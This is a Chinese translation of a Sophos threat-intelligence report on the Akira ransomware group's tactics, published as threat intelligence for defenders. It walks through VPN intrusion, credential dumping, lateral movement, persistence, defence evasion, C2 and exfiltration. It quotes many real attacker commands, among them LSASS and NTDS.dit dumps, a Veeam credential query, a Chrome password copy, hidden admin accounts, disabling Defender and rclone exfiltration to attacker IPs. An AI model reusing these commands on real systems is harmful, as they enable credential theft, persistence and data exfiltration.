Sophos MDR威脅情報團隊曾于2023年5月發表過一篇博文,稱Akira勒索軟件“將1988年的時光帶回”。起因是Akira會將受害者網站篡改為具有復古美學的頁面,讓人想起20世紀80年代的綠色屏幕控制臺。而且,Akira的名字也可能取自1988年流行的同名動畫電影《阿基拉》(Akira)。
事實上,自Akira勒索軟件組織于2023年3月發起首次攻擊以來,便迅速成為中小型企業面臨的強大勒索軟件威脅,其數據泄露網站上赫然陳列著數百名受害組織名錄。
根據Sophos的數據集顯示,Akira主要針對位于歐洲、北美和澳大利亞的組織,這些組織在政府、制造業、技術、教育、咨詢、制藥和電信等領域開展廣泛業務。
【圖1:Sophos觀察到的Akira勒索軟件攻擊時間線】
要點概述
- 從2023年10月開始,Sophos觀察到Akira行為者只執行勒索操作的新趨勢,即在沒有部署勒索軟件或加密系統的情況下從受害者環境中竊取數據;
- 在Sophos回應的所有Akira事件中,Sophos只觀察到2023年8月底發生的一起利用Megazord勒索軟件變體的案例;
- 在一次事件中,Sophos觀察到Akira攻擊者利用以前未報告的后門(exe)來建立命令和控制(C2),這標志著Akira攻擊者通常傾向于使用雙重用途代理來實現C2功能;
- 在針對具有Sophos端點保護的組織的攻擊中,Sophos反復觀察到Akira參與者試圖卸載和/或禁用Sophos保護以逃避檢測。
完整攻擊鏈分析
初始訪問
Akira勒索軟件參與者最常用的初始訪問模式是通過缺乏多因素身份驗證(MFA)的帳戶未經授權地登錄VPN。通常情況下,Sophos觀察到Akira攻擊者專門針對沒有啟用MFA的Cisco VPN產品,例如Cisco ASA SSL VPN或Cisco AnyConnect。
除了針對缺乏MFA的產品外,Akira攻擊者還會利用VPN軟件本身的已知漏洞。在一個案例中,威脅行為者利用組織Cisco ASA中的漏洞(CVE-2023-20269)在受害者的基礎設施中建立未經授權的遠程訪問VPN會話。
憑據訪問
在獲得對目標環境的訪問權之后,Akira參與者會使用各種方法來獲取推進其目標所需的憑據。Sophos經常觀察到參與者試圖執行LSASS進程內存的minidump,并獲取存儲在內存中的額外憑據,如下所示:
cmd /c rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 572 C:\ProgramData\lsass.dmp full
攻擊者還經常試圖獲取存儲在Active Directory數據庫中的憑據,旨在破壞整個域憑據。在某些情況下,研究人員還觀察到它們從組織的域控制器復制SYSTEM注冊表單元和NTDS.dit文件,來獲取用戶帳戶的完整列表及其相應的域密碼散列。在其他事件中,Akira參與者還會利用ntdsutil工具對Active Directory數據庫執行脫機圖像捕獲。
研究人員注意到有下述兩個命令用于轉儲NTDS.dit文件和系統注冊表:
"cmd.exe" /c C:\ProgramData\Cl.exe -c -i C:\Windows\NTDS\ntds.dit -o C:\programdata\nt.txt "cmd.exe" /c C:\ProgramData\Cl.exe -c -i c:\Windows\System32\config\SYSTEM -o C:\programdata\sys
研究人員還注意到一個用于運行NTDSUtil來執行憑證轉儲的命令:
ntdsutil "ac i ntds" "ifm" "create full c:\Programdata\temp\Crashpad\Temp\abc" q q
此外,在最近觀察到的幾個Akira案例中,威脅參與者似乎特別關注Veeam憑證,并經常利用Veeam Credential Dumper腳本將存儲在Veeam備份服務中的憑證轉儲為明文。在許多情況下,研究人員觀察到威脅參與者通過交互式PowerShell ISE會話運行開源Veeam-Get-Creds腳本,以獲得域憑據并轉向其他主機。此活動由Sophos在檢測“WIN-PROT-VDL-PUA-VEEAM-CREDENTIAL-DUMPER”時識別。
至少在一個案例中,取證證據表明,威脅行為者可能利用該組織的Veeam Backup & Replication組件中的漏洞(CVE-2023-27532)來訪問存儲在配置數據庫中的所有加密憑據。威脅行為者通過以下方式檢索到Veeam憑據:
sqlcmd.exe -S localhost,60261 -E -y0 -Q "SELECT TOP (1000) [id],[user_name],[password],[usn],[description],[visible],[change_time_utc]FROM [VeeamBackup].[dbo].[Credentials];"
Sophos還觀察到Akira攻擊者試圖獲取多個用戶的Chrome瀏覽器緩存憑據。在特定情況下,威脅參與者使用供應商帳戶訪問組織域控制器上的密碼列表文檔(G:\IT\IT Manual\ password list Part a .doc和G:\IT\temp.txt),然后使用esentutl.exe從Google Chrome用戶數據目錄中創建文件“Login Data”的.tmp副本,所用命令如下所示:
esentutl.exe /y "C:\Users\<user>\AppData\Local\Google\Chrome\User Data\Default\Login Data" /d "C:\Users\<user>\AppData\Local\Google\Chrome\User Data\Default\Login Data.tmp"
在一些案例中,Akira參與者被觀察到在收集數據時訪問云帳戶的KeePass備份代碼:
C:\Windows\system32\NOTEPAD.EXE \\<Redacted>\it\KeePass\Department Cloud Accounts - Backup Codes\-backup-codes.txt
少數情況下,研究人員還發現Akira參與者使用Mimikatz工具并執行各種程序進行憑據訪問,包括繞過Windows憑據保護的BypassCredGuard.exe和竊取存儲在各種web瀏覽器中的密碼的WebBrowserPassView.exe:
C:\Users\testrdp\Downloads\Mimik\Pass\BypassCredGuard.exe C:\Users\testrdp\Downloads\Mimik\Pass\WebBrowserPassView.exe C:\Users\testrdp\Downloads\Mimik\Pass\netpass64.exe C:\Users\testrdp\Downloads\Mimik.exe
發現
Sophos通常使用內置ping和net命令觀察Akira參與者,以發現環境中的其他系統并識別目標設備的狀態。實際上,在所有情況下,都可以看到Akira參與者枚舉Active Directory信息,特別是Domain Administrators組和Local Administrators組。為了做到這一點,他們利用了本地命令行實用程序,如Get-ADComputer和Adfind.exe。
"C:\Windows\system32\cmd.exe" /c net localgroup Administrators "C:\Windows\system32\net.exe" localgroup administrators Get-ADComputer -Filter * -Property * | Select-Object Enabled, Name, DNSHostName, IPv4Address, OperatingSystem, Description, CanonicalName, servicePrincipalName, LastLogonDate, whenChanged, whenCreated > C:\ProgramData\AdComp[.]txt
Akira攻擊者還使用多個帳戶進行網絡掃描,并使用Advanced IP Scanner和Netscan等工具來評估目標的網絡拓撲,如下所示:
C:\Users\<user>\Desktop\netscan_n.exe C:\users\<user>\appdata\local\temp\3\advanced ip scanner 2\advanced_ip_scanner.exe C:\Users\<user>\Desktop\Advanced_IP_Scanner_2.5.4594.1.exe
還有一個特別獨特的案例,Sophos觀察到威脅參與者執行程序ck.exe,這是一個可執行文件,似乎與勒索軟件二進制文件Lck.exe一起工作。ck.exe的執行產生了大量的遙測,記錄了勒索軟件二進制Lck.exe訪問目標網絡內的大量文件和網絡共享,其中一些如下所示:
- start c:\programdata\lck.exe -p="\\172.16.x.x\Development" -n=20 - start c:\programdata\lck.exe -p="\\172.16.x.x -n=20 - start c:\programdata\lck.exe -p="\\172.16.x.x\Finance" -n=20 - start c:\programdata\lck.exe -p="\\172.16.x.x\IT General" -n=20 - start c:\programdata\lck.exe -p="\\172.16.x.x\Security" -n=20 - start c:\programdata\lck.exe -p="\\172.16.x.x\Senior Management” -n=20 - start c:\programdata\lck.exe -p="\\172.16.x.x\Systems" -n=20
橫向移動
在整個事件中,Sophos經常觀察到Akira參與者使用遠程桌面協議(RDP)和有效的本地管理員用戶帳戶在目標環境中橫向移動。在一次事件中,威脅行為者在初始訪問和勒索軟件部署之間使用RDP超過100次,以訪問總共15臺機器。
他們還經常使用SMB和RDP一起進行橫向移動,在某些情況下使用Impacket模塊wmiexec進行橫向移動。其他用于橫向移動的工具還包括VmConnect.exe,它使用戶能夠連接和管理運行在Hyper-V主機上的虛擬機(VM)。在這種情況下,攻擊者使用一個受損的管理員帳戶啟動Hyper-V管理界面并訪問組織的虛擬機。
Akira在具有本地系統特權的遠程系統上運行命令。
7045 LocalSystem PSEXESVC %SystemRoot%\PSEXESVC.exe <username> user mode service demand start
該活動是Sophos在檢測“WIN-PROT-VDL-PUA-PSEXEC”時識別出來的。
持久性和特權升級
研究觀察到Akira參與者多次創建用戶帳戶,并使用net命令將帳戶添加到啟用安全的本地組中,作為建立持久性的一種手段,如下所示:
C:\Windows\system32\net1 user <username> <RedactedPassword> /ADD C:\Windows\system32\net1 localgroup Administrators <username> /ADD
研究人員還觀察到他們經常重置多個域帳戶的密碼,以確保他們將來能夠登錄該帳戶。為了進一步保持持久性并在受感染的系統中提升權限,Akira參與者偶爾會將新創建的用戶添加到特殊帳戶注冊表項中,該活動由Sophos在檢測“WIN-EVA-PRC-HIDE-LOGON-REGISTRY-1”時識別:
"C:\Windows\system32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v <username> /t REG_DWORD /d 0 /f
此外,在一次攻擊中,Sophos觀察到攻擊者創建了一個名為“ESX Admins”的新域名組,然后將新創建的帳戶添加到其中:
net group "ESX Admins" /domain /add net group "ESX Admins" <username> /domain /add net user admin P@ssw0rd! /add net localgroup "administrators" admin /add
此外,在某些情況下,Sophos XDR檢測到威脅參與者使用服務管理器工具nssm.exe(路徑C:\Windows\tmp\nssm.exe或C:\Windows\tmp\nssm-2.24\win64\nssm.exe)來創建惡意服務“sysmon”,該服務執行sysmon.exe并啟動隧道工具(如Ngrok或ligolo - ong)來建立對受感染機器的遠程訪問。
‘’{"EventData”:{“AccountName”:”LocalSystem”,”ImagePath”:”C:\\Windows\\tmp\nssm.exe”,
“ServiceName”:”Sysmon”,”ServiceType”:”user mode service”,”StartType”:”auto start”}}
"C:\Windows\tmp\sysmon.exe" start --all --region us --config=C:\Windows\tmp\config.yml
該活動由Sophos在檢測“ATK/Ligolo-C”和“Mal/Generic-R”時識別。
防御逃逸
研究人員觀察到,幾乎所有事件都顯示Akira攻擊者在試圖卸載Sophos端點保護和其他安全監控工具。大多數情況下,攻擊者試圖通過以下可執行文件卸載Sophos端點:
C:\Program Files\Sophos\Sophos Endpoint Agent\uninstallgui.exe. C:\Program Files\Sophos\Sophos Endpoint Agent\SophosUninstall.exe
在一個案例中,Sophos觀察到Akira參與者在執行勒索軟件二進制文件前大約一小時試圖在組織的虛擬機上禁用Sophos端點。為了做到這一點,威脅參與者試圖在虛擬機關閉電源時刪除所有Sophos服務,其目標是導致Sophos服務在重新打開電源時無法加載,并為參與者創造一個靜默運行勒索軟件可執行文件的機會。
研究人員還觀察到,在一些情況下,攻擊者還會試圖禁用Windows Defender的實時監控:
Set-MpPreference -DisableRealtimeMonitoring $true
為了進一步逃避防御并隱藏其活動,攻擊者經常使用runas在不同于他們登錄的用戶的上下文中運行命令:
runas /netonly /user:<username>\<username> cmd
這不僅使得防御者更難以追蹤其活動,還可以使其以更高的權限運行。這些攻擊者還試圖在活動完成后刪除用于文件收集的工具,以避免被檢測到。
命令和控制
就命令和控制(C2)而言,威脅參與者經常使用流行的雙重用途代理AnyDesk來建立對受影響組織網絡內多個系統的持久遠程訪問。
"C:\Users\<user>\Downloads\AnyDesk.exe" --install "C:\Program Files (x86)\AnyDesk" --start-with-win --create-shortcuts --create-taskbar-icon --create-desktop-icon --install-driver:mirror --install-driver:printer --update-main --svc-conf "C:\Users\<user>\AppData\Roaming\AnyDesk\service.conf" --sys-conf "C:\Users\<user>\AppData\Roaming\AnyDesk\system.conf"
在一個案例中,攻擊者還執行DWAgent安裝程序進行遠程訪問,Sophos在“WIN-PER-PRC-DWAGENT-INSTALL-1”檢測下識別到了這一點:
"C:\Users\<user>\Downloads\dwagent.exe"
此外,在一個獨特的事件中,Sophos觀察到Akira參與者釋放了一個定制的木馬(C:\ProgramData\Microsoft\crome.exe),該木馬與攻擊者控制的IP地址170.130.165[.]171,并允許威脅行為者在網絡上保持立足點:
"cmd.exe" /c C:\ProgramData\Microsoft\crome.exe
Sophos對各種Akira事件的調查,揭示了該組織從目標環境中竊取數據的高度優先級。在幾乎所有觀察到的案例中,Akira攻擊者都使用了各種工具來竊取敏感信息,其中至少有兩個案例只專注于竊取,而沒有部署勒索軟件二進制文件。
Akira參與者支持的主要工具包括WinRAR、WinSCP、rclone和MEGA。在幾起事件中,攻擊者下載并安裝了WinRAR,然后通過Chrome瀏覽器將收集到的數據壓縮成RAR檔案以進行滲漏:
"C:\Users\<user>\Downloads\winrar-x64-623.exe"
一旦攻擊者將多個文件添加到壓縮的RAR文件中,他們就會使用各種方法將數據泄露到攻擊者控制的IP上。在一個案例中,攻擊者通過explorer.exe安裝了WinRAR和Google Chrome,并將大約34GB的數據壓縮到“C:\ProgramData\”目錄下的多個歸檔文件中,然后使用Chrome.exe將數據泄露到外部IP地址13.107.42[.]12。RAR文件名包括前雇員的Data.rar、Benefits.rar、Workerscomp.rar以及與特定用戶相關的文件。
在其他情況下,Akira參與者使用rclone來泄露信息——在一個案例中,攻擊者甚至成功地將近483GB的數據泄露到攻擊者控制的IP地址185.82.216[.]上。在另一起事件中,攻擊者使用rclone與目標財產中的近1500個文件進行交互,并連接到攻擊者控制的IP 地址104.200.72[.]33。
rclone copy \\192.168.XXX.214\f$ st:"/home/.../.../F" --max-age 1y --exclude "*.{MOV,FIT,fit,FIL,fil,mp4,AVI,avi,mov,MOV,iso,exe,dll,psd,PSD,7z,7Z,rar,RAR,zip,mox,MOX,wav,WAV,bpm,BPM,mts,MTS,ts,TS,JS,js,ttf,log,map,ai,tmp,TMP,DB,db,mpeg,MPEG,xmp,html,ini,msg,aac,AAC,bak,BAK,DAT,dat,lnk,dwg,indb,indd,svg,idml,ZIP,CAB,EXE,MSI,bin,XML,MMF,DAT,DS_Store,mpp,mp3,m4a,M4A,pkg,gz,ova,iso,mdb,DLL,MP4,mkv,MKV,MP3,WMA,g64x,ufdr,vob,VOB,ave,AVE,P01,p01,PO1,po1,dav,DAV,fls,FLS,dist,DIST.c01,C01}" -q --ignore-existing --auto-confirm --multi-thread-streams 25 --transfers 25 –P
Sophos還經常觀察到Akira行為者通過MEGA泄露數據,并在幾起事件中檢測到Google Chrome連接到以下MEGA文件共享服務IP:
- 35[.]22
- 25[.]71
- 127[.]13
- 35[.]202
影響
Sophos幾乎在所有案例中都觀察到勒索軟件的執行,但參與者大多只執行數據泄露,而沒有觀察到任何加密指標。
Akira攻擊者在目標環境中停留的時間——從第一次觀察到活動到產生影響(包括滲透和勒索軟件部署)——從不到一天到25天不等。
雖然勒索軟件二進制文件在各種入侵活動間存在輕微的偏差,但Sophos反復觀察到Akira參與者以“w.e exe”的名義部署勒索軟件二進制文件,以加密目標網絡中的多臺設備:
C:\w[.]exe C:\Users\install\Downloads\w[.]exe \\192.168.XXX.37\c$\w[.]exe
雖然在入侵期間,參與者會在一些服務器上手動執行勒索軟件,但主要的加密模式是通過SMB實現的。在感染后,勒索軟件會加密擴展名為“akira”的文件,在受影響的設備上創建名為“akira_readme.txt”的贖金通知,并刪除卷影副本。
【圖2:Akira勒索軟件贖金通知樣本】
在一個案例中,Sophos觀察到,在將文件移動到c:\programdata\w.exe之前,Akira參與者會通過RDP會話交互式地將w.exe加載到c:\users\<user>\documents\w.exe,并在那里執行它以加密c:\和E:\驅動器。在這種情況下,攻擊者成功地加密了一臺服務器上大約65,000個文件,以及目標域控制器的E:\驅動器上的許多文件。
Sophos還觀察到,攻擊者將Akira勒索軟件二進制文件部署在Lck.exe、1.exe和locker.exe名稱下。在名為1.exe的勒索軟件二進制文件的情況下,Akira參與者使用BAT文件(1.bat, 3.bat, 5.bat)在SMB共享上加密受害者系統,這些文件包含以下類似的命令:
start 1.exe -p="\\<redacted> \C$" -n=10 start 1.exe -p="\\ <redacted> \ <redacted>$" -n=10 start 1.exe -p="\\ <redacted> \D$" -n=10
該活動是Sophos在檢測“Troj/Akira-A”,“Troj/Ransom-GZA”和“Troj/Ransom-GZL”時識別出來的。
總結
在5月份關于Akira勒索軟件的博文中,Sophos介紹了兩次觀察到的Akira感染,并就如何最好地防范威脅組織攻擊鏈的每一步提供了指導。在這篇文章中,Sophos進一步增加了關于Akira勒索軟件的現有知識體系,并提供了有關威脅行為者在過去幾個月中的戰術演變的進一步細節。
在過去的幾個月里,Sophos觀察到Akira攻擊者優先在目標環境中進行滲透,可能是為了勒索組織泄露的數據。雖然只在少數案例中被注意到,但Akira最近在沒有加密的情況下進行竊取的趨勢可能表明,攻擊者采取了新的策略來勒索受害者,而不會增加部署勒索軟件可能引發的檢測風險。隨著Akira繼續利用各種憑據訪問和防御逃避技術,Sophos將繼續密切監控Akira勒索軟件的活動,并跟蹤其不斷發展的策略,旨在為組織建立最好的保護措施,以檢測和防止此類活動。
原文鏈接:
https://news.sophos.com/en-us/2023/12/21/akira-again-the-ransomware-that-keeps-on-taking/
cayman
上官雨寶
007bug
Andrew
007bug
上官雨寶
虹科網絡安全
Anna艷娜
Anna艷娜
FreeBuf
007bug
X0_0X
